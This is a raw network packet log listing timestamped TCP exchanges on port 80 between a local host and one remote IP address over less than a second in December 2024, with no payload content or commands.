Dec 14, 2024 23:58:27.685647964 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.685702085 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.688354969 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.688407898 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.688457012 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.689425945 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.691148043 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.691293001 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.691342115 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.693989992 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.694055080 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.694103956 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.696753979 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.696871042 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.696921110 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.699556112 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.699600935 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.699656963 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.701437950 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.702353001 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.705432892 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.817403078 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.817507982 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.817770958 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.818589926 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.818649054 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.818692923 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.818738937 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.821010113 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.821073055 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.821152925 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.821335077 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.823451996 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.823514938 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.823544979 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.823623896 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.825853109 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.825999022 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.826019049 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.826062918 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.828258991 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.828305006 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.828347921 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.828389883 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.830682993 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.830838919 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.830876112 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.831034899 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.833029985 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.833079100 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.833266973 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.833312035 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.835443974 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.835491896 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.835531950 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.835577965 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.837841988 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.837897062 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.837930918 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.837971926 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.840229034 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.840286970 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.840348005 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.840393066 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.842803001 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.842822075 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.842854023 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.842854023 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.845000029 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.845042944 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.845122099 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.845233917 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.847408056 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.847464085 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.847536087 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.847579956 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.849793911 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.849842072 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.849906921 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.849953890 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.852207899 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.852253914 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.852279902 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.852335930 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.854628086 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.854674101 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.854914904 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.854954004 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.856975079 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.857027054 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.857100964 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.857142925 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.859357119 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.859409094 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.859484911 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.859525919 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.861752033 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.861835003 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.861871958 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.861933947 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.864135027 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.864243031 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.864269018 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.864320993 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.866509914 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.866600037 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.866645098 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.866795063 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.868917942 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.868966103 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.869013071 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.869054079 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.871294975 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.871443033 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.871448994 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.871483088 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.873739958 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.873802900 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.873823881 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.873864889 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.876104116 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.876163006 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.876188993 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.876230001 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.878473043 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.878516912 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.878575087 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.878618002 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.880906105 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.880945921 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.880981922 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.881022930 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.883250952 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.883291006 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.883363962 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.883404016 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.885649920 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.885691881 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.885752916 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.885792017 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.888068914 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.888120890 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.888196945 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.888237000 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.890460968 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.890507936 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.890572071 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.890609980 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.892852068 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.892899036 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.892935038 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.892980099 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.895323992 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.895370960 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.895461082 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.895582914 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.897610903 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.897664070 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.897700071 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.897742033 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.900010109 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.900054932 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.900121927 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.900160074 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.902473927 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.902517080 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.902714014 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.902754068 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.904771090 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.904815912 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.904897928 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.904942989 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.907162905 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.907212019 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.907284975 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.907344103 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.909560919 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.909630060 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.909665108 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.909706116 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.912070990 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.912170887 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.912189960 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.912216902 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.914350033 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.914460897 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.914515972 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.916748047 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.916791916 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.916850090 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.916889906 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.919111967 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.919169903 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.919241905 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.919285059 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.921528101 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.921572924 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.921612978 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.921654940 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.923953056 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.924015045 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.924179077 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.924236059 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.926296949 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.926363945 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.926422119 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.926466942 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.928714037 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.928769112 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.928807974 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.928848028 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.931099892 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.931154013 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.931221008 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.931263924 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.933470011 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.933518887 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.933592081 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.933631897 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.935873032 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.935937881 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.935982943 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.936022043 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.938301086 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.938355923 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.938405991 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.938446999 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.940671921 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.940711975 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:27.940747023 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:27.940787077 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.009762049 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.009830952 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.009968042 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.009968042 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.010725021 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.010768890 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.010888100 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.010929108 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.012799978 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.012842894 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.012960911 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.013006926 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.014905930 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.014955997 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.015074968 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.015121937 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.017102003 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.017152071 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.017153025 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.017194986 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.018989086 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.019036055 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.019110918 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.019155025 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.021034002 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.021081924 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.021135092 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.021174908 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.023001909 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.023117065 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.023207903 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.024920940 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.024969101 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.025043964 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.025083065 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.026875973 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.026922941 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.027087927 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.027127981 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.028765917 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.028825998 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.028899908 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.028939962 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.030610085 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.030668974 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.030725002 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.030770063 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.032479048 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.032525063 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.032601118 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.032645941 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.034368038 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.034410954 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.034435034 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.034473896 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.036154032 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.036211014 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.036258936 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.036298037 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.037952900 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.037997007 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.038100004 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.038144112 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.039683104 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.039730072 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.039799929 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.039840937 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.041445017 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.041500092 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.041573048 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.041611910 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.043203115 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.043256998 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.043315887 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.043358088 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.044967890 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.045012951 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.045026064 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.045066118 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.046683073 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.046730042 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.046777010 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.046816111 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.048327923 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.048384905 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.048464060 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.048507929 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.050029993 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.050086021 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.050153017 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.050198078 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.051723957 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.051768064 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.051836967 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.051877975 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.053445101 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.053487062 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.053589106 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.053632021 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.055152893 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.055198908 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.055308104 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.055351973 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.056915998 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.056965113 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.056999922 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.057041883 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:28.058825970 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:28.058866024 CET	49813	80	192.168.2.4	185.215.113.16
